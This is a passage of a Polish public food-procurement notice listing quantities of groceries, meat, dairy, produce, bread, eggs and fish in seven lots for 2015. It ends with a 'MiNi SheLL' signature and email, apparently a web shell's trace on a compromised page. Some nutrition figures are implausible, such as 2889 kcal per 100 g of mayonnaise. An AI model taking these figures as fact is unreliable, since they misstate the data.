Przyprawa warzywna do potraw - wartość energetyczna w 100 g produktu 137 kcal, białka 8,5g,op.75g 
25 kg
Majonez dekoracyjny,bez konserwantów- wartość energetyczna w 100 g produktu 2889 kcal, białka1,3g, op.250 ml słoik

60 szt
Majonez dekoracyjny,bez konserwantów- wartość energetyczna w 100 g produktu 2889 kcal,białka 1,3g, op.400 ml słoik 
30 szt
Majonez dekoracyjny,bez konserwantów- wartość energetyczna w 100 g produktu 2889 kcal,białka 1,3g, op.700 ml  słoik 
20 szt
Groch łuskany, op.1 kg 

30 kg
Fasola biała Jaś, op.1 kg

30 kg
Rogal z nadzieniem, mix smaków-wartość energetyczna w 100 g produktu 450 kcal,białka 7g, op.60 g
100 szt
Cukier puder, op.400 g
10  szt
Cukier waniliowy, op.16 g
150 szt
Proszek do pieczenia, op.18 g 
40 szt
Kwasek cytrynowy, op.20 g
50 szt
Pieprz czarny mielony, op.20 g
80 szt
Pieprz ziołowy mielony, op.20 g
30 szt
Przyprawa tzatziki, op.20 g
25 szt
Czosnek granulowany, op.20 g
80 szt
Papryka słodka, op.20 g
50 szt
Papryka ostra, op.20 g
50 szt
Przyprawa do grilla, op.20 g
70 szt
Przyprawa do kurczaka, op.20 g
70 szt
Przyprawa do ryb, op.20 g
25 szt
Majeranek otarty, op.10 g
30 szt
Sól spożywcza jodowana, op.1 kg
80 kg
Bazylia, op 7 g
10 szt
Oregano, op.7 g
10 szt
Wiórki kokosowe, op.100 g
5 szt
Rodzynka, op.100 g
5 szt
Goździki całe, op.10 g
10 szt
Soda oczyszczona, op.70 g
20 szt
Napój owocowy, mix smaków - wartość energetyczna w 100 ml produktu 47 kcal,białka 0,2g, op. 400 ml
250 szt
Konserwa gulasz angielski, 
op.300 g - puszka
10 szt
Ogórek konserwowy- op.0,9 l-słoik

90 szt
Krem do smarowania pieczywa z orzechami laskowymi-wartość energetyczna w 100 g 544 kcal,
białka 6 g, op. szklane 230g
90 szt
Koncentrat barszczu czerwonego, op.330 ml-
butelka szklana
12 szt
Ananas 565 g, po odcieku 340 g , puszka
20 szt
Brzoskwinia 850 g,bez zalewy 460 g, 
20 szt
Wafle suche-wartość energetyczna w 100 g produktu355kcal,białka9,9g,op.250g
50 szt
Orzechy łuskane, op.100 g
6 szt
Czekolada mleczna - wartość energetyczna w 100g produktu 
530 kcal,białka 5,6g, op.100g 
150 szt
Czekolada mleczna, mix smaków 
nadziewana, op. 100 g
150 szt
Kompot owocowy,mix smaków pasteryzowany, op.900 g - słoik
80 szt
Cynamon mielony, op.20 g
15 szt
Woda mineralna nienasycona dwutlenkiem węgla -średnio zmineralizowana, składniki  mineralne 742 mg/l, op.1,5 l 
250 szt
Woda mineralna niegazowana -całkowita ogólna mineralizacja
258,27 mg/l , op.500 g 
200 szt
Woda  źródlana - niegazowana, butelka plastikowa- op. 5 L
110 szt 
Wafle przekładane kremem kakaowym-wartość energetyczna w 100 g produktu 468 kcal, białka 8,1 g, op.26 g 
100 szt
Mleko w proszku, op.500 g
5 szt
Krem do ciast czekoladowy w proszku-wartość energetyczna w 100 g produktu 159 kcal, białko5 g, op.110 g
10 szt
Krem do ciast waniliowy w proszku- wartość energetyczna w 100 g produktu184 kcal, białko3,9g,op.120 g 

10 szt
Ser topiony kostka- zawartość tłuszczu 27 % , op.100 g
150 szt
Papryka konserwowa słodka-skład:papryka70%, op.900g - słoik
20 szt
Oliwa z oliwek, op. 0,5 l
10 szt
Lizak kulisty, op.8 g  ( pakowane po 50 szt )
4 op.
Drożdże piekarskie. op.100g, 
10 szt
Kisiel błyskawiczny mix smaków- wartość energetyczna w 100g produktu 369kcal,białka0,3g,op.31,5g 
400 szt
Budyń błyskawiczny mix smaków- 
wartość energetyczna w 100 g produktu 80 kcal,białka 1,8g,op.43 g
350 szt
Sos sałatkowy, mix smaków, op. 9 g,
typu Knorr lub równoważny 
30 szt
Liść laurowy, op.8 g
50 szt
Ziele angielskie, op.15 g
50 szt
Przyprawa do gyrosa, op.30 g 
20 szt
Gałka muszkatałowa mielona op 10 g
5 szt
Ćwikła z chrzanem,op.300 g
6 szt
Pasztet wielkopolski -  
 mix smaków, op. alupack 131g
30 szt
Cukierki czekoladowe, op.1 kg
5 kg
Draże- mix smaków- op.70 g
200 szt
Płatki kukurydziane z miodem i orzeszkami- wartość energetyczna w 100  produktu 400 kcal,białka 7,1 g,op.250g 
10 szt
Płatki kukurydziane karmel i czekolada- wartość energetyczna w 100 g produktu 402 kcal,białka 8,3 g, op.225 g-10 szt, Makaron kolanko małe- wartość energetyczna w 100 g produktu 357,7 kcal,białka 11,0g,op.500g-10 szt,  Żurek  na zakwasie w butelce, op. 500 ml
60 szt,  Przyprawa do żurku i barszczu 1.000 g-1 op. ,Pomidory w puszce op 400g.-
20 szt, Ocet jabłkowy op.250 ml-5 szt, 
Herbata miętowa ekspresowa op 20 torebek
30 szt
Herbata zielona ekspresowa, mix smaków- op 20 torebek
20 szt
Cebulka suszona op 500 g
3 szt
Oliwki zielone drylowane op 200g-5 szt, Pomidory suszone op 280g-4 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MIĘSO, PRODUKTY MIĘSNE I WĘDLINY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wędliny

Kiełbasa śląska wieprzowa
80 kg
Boczek wędzony gotowany
20 kg
Szynka konserwowa
15 kg
Szynka królewiecka
20 kg
Mortadela wieprzowa
10 kg
Ogonówka wieprzowa
30 kg
Parówka cienka wieprzowa
70 kg
Kaszanka
20 kg
Szynka drobiowa
20 kg
Polędwica sopocka
12 kg
Pasztet drobiowy
20 kg
Pasztet wieprzowy
15 kg
Kiełbasa żywiecka
30 kg
Mielonka konserwowa
50 kg
Kiełbasa podwawelska wieprz.
15 kg
Kiełbasa zwyczajna
40 kg
Szynka wieprzowa
6 kg
Kiełbasa szynkowa wieprz.
6 kg
Szynka tyrolska
10 kg
Kiełbasa krakowska sucha
10 kg
Kabanos drobiowy
3 kg
Szynka tradycyjna
6 kg
Serdelki drobiowe
15 kg 
Wędliny - wartość ogółem :


 Mięso i produkty mięsne


Mięso stekowe wieprzowe
50 kg
Mięso mielone wieprz-wołowe
80 kg
Kości wędzone
20 kg
Kości wieprzowe
20 kg
Porcja rosołowa
100 kg
Kurczak świeży
70 kg
Żołądki drobiowe
10 kg
Wątróbka drobiowa
30 kg
Udka z kurczaka
90 kg
Filet drobiowy z kurczaka
100 kg
Skrzydełka z kurczaka
35 kg
Łopatka b / k
100 kg
Schab b / k
50 kg
Karczek b / k
55 kg
Żeberka wieprzowe
20 kg
Ćwiartka z kurczaka
40 kg
Słonina
4 kg
 Pasztet zapiekany
15 kg
 Pieczeń rzymska
5 kg 
Wołowina extra
20 kg
Szponder
10 kg
Żołądki indycze
15 kg
Filet z indyka
40 kg
Udka wędzone
7 kg
Kurczak wędzony
7 kg
Schab pieczony
5 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PRODUKTY MLECZARSKIE..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko pasteryzowane -
zawartość tłuszczu 2,0 % , op. karton 1 l

3 000 szt

Jogurt mix smaków owocowy -
wartość energetyczna w 100g produktu 
77 kcal,białka 1,8g op.125g
300 szt

Jogurt naturalny, zawartość tłuszczu 2 % -  wartość energetyczna w 100 g produktu 
59 kcal,białka 4,2 g,op. kubek 400 g, gęsty 
10 szt

Serek wiejski - wartość energetyczna w 100g produktu 112 kcal,białka12g,op 200g 
60 szt

Śmietana-zawartość tłuszczu 12% ,wartość energetyczna w 100g produktu  
134 kcal,białka 2,7 g, op. kubek 400 g
200 szt

Śmietana- zawartość tłuszczu 18%,wartość energetyczna w 100g produktu 186 kcal,
białka 2,8g, op. kubek 400 g
250 szt

Serek homogenizowany,
termizowany, mix smaków- wartość energetyczna w 100g produktu136 kcal,
białka 5,0g, op.150 g
200 szt

Twaróg śmietankowy tłusty-wartość energetyczna w 100 g produktu 
168 kcal,białka 17,9
30 kg

Jogurt pitny, mix smaków-wartość energetyczna w100g produktu 64 kcal,
białka 3,1g, op. 330 g
60 szt

Maślanka - zawartość tłuszczu 1,5 % - 
mix smaków, op. butelka 1 l
50 szt

Deser o smaku czekoladowym lub waniliowym z bitą śmietanką- wartość energetyczna w 100g produktu 108 kcal,
białka1,4 g ,op.175 g
100 szt

Ser żółty- salami
25 kg

Ser żółty- gouda
20 kg

Serek kanapkowy mix smaków -
wartość energetyczna w 100g produktu 255 kcal,białka 6 g,op.150g
80 szt

Ser topiony bloczek- zawartość tłuszczu 27%, mix smaków, op.100g 
150 szt

Kefir - wartość energetyczna w 100g produktu 43 kcal,białka 3,0g  op. butelka 400 g 
100 szt

Deser mleczno-czekoladowy z orzechami, wart. energ. w 100 g. produktu 195 kcal, białka 2,8 g
200 szt

Ser twarogowy półtłusty -
zawartość tłuszczu 4%
35 kg

Ser twarogowy chudy - zawartość tłuszczu 0,5%

5 kg

Śmietanka kremówka 36% ,op. karton 0,5 l

20 szt

Mleko słodzone gotowane -
wartość energetyczna w 100 g produktu 297 kcal, białka 6,8 g,op.510 g -10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> OWOCE I WARZYWA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Owoce


Banan
70 kg
Cytryna
60 kg
Jabłka
240 kg
Gruszka
50 kg
Kiwi
40 kg
Mandarynka
20 kg
Pomarańcza
55 kg
Brzoskwinia
15 kg
Arbuz świeży seonowy
50 kg
Nektarynka
30 kg
Winogron biały
2 kg
 Śliwki węgierki 
30 kg 
Truskawki (sezonowo)-10 kg.
Warzywa

Burak czerwony
200 kg
Cebula
240 kg
Czosnek surowy
65 szt
Kapusta biała
40 kg
Kapusta czerwona
90 kg
Kapusta kwaszona
220 kg
Kapusta włoska
10 szt
Kapusta pekińska
55 kg
 Szczaw świeży
30 peczków
Koperek
300 szt
Marchew korzeń
540 kg
Ogórek zielony 
240 kg
Ogórek kiszony
200 kg
Papryka świeża (różne kolory)
75 kg
Pieczarka świeża 
85 kg
Pietruszka korzeń
160 kg
Pietruszka natka
300 szt
Pomidor
230 kg
Por
150 kg
Rzodkiewka
120 szt
Rzodkiew biała krajowa -15 kg, Sałata zielona
140 szt
Seler korzeń
170 kg
Szczypiorek
180 szt
Ziemniaki
4 000 kg
Brokuł świeży głowiasty 
30 szt
 Kalafior świeży głowiasty
55 szt
 Fasolka szparagowa
10 kg
 Cukinia
20 kg
 Kalarepa
10 kg
 Bób świeży sezonowo-10 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PIECZYWO I ŚWIEŻE WYROBY PIEKARSKIE..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb pszenno-żytni, krojony 600g
 
1 500 szt
Bułka wrocławska 100 g

900 szt
Chleb graham, krojony 500g

100 szt
Bułka słodka 100 g

250 szt
Pączek 100 g

150 szt
Chleb tostowy, krojony 400g

50 szt
Chleb wieloziarnisty, krojony 400g 

10 szt
Bułka wieloziarnista 70 g

25 szt
Bułka grahamka 80 g

500 szt
Chleb cebulowy, krojony 350 g

140 szt
Rogal maślany 100 g

50 szt
Chałka drożdżowa 300 g

30 szt
Bułka wrocławska, hot-dog 100g

100 szt
Bułka maślana 70 g

200 szt
Bułka tarta-wartość energetyczna w 100 g produktu 347 kcal,białka 9,6g, op.500 g-30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> JAJA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja - klasa wagowa L  - 3 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSERWOWE ORAZ MROŻONKI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z morszczuka, SHP-bez glazury, świeżo mrożony, ładnie wyporcjowany, bez ości 
35 kg
Filet z soli, 1 kg płaty  SHP 

10 kg
Filet z dorsza SHP-bez glazury, świeżo mrożony, ładnie wyporcjowany, bez ości 
40 kg
 Makrela wędzona- świeży zapach

3 kg
 Tuńczyk w kawałkach w wodzie- puszka op. 170 g.
40 szt
Brokuł mrożony

20 kg
Fasolka szparagowa mrożona

30 kg
Kalafior mrożony

40 kg
Mieszanka jarzynowa 
7-składnikowa mrożona

30 kg
Marchew z groszkiem mrożona

50 kg
Truskawka mrożona-20 kg. Mieszanka kompotowa mrożona

10 kg
Filety ze śledzia w oleju-skład:filety ze śledzia ze skórą parowane 60 %,op.170 g.
30 szt
Filety ze śledzia w sosie pomidor. - skład:filety ze śledzia ze skórą 
parowane 50%, op.170g - puszka-20 szt,
Paprykarz szczeciński-skład:ryba rozdrobniona 40%,op.156g - alupack
80 szt, Sałatka rybna - skład: mięso ryb morskich 35%, op.135g - alupack
30 szt
 LODY pyszne-mix smaków, op. 200 ml-100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com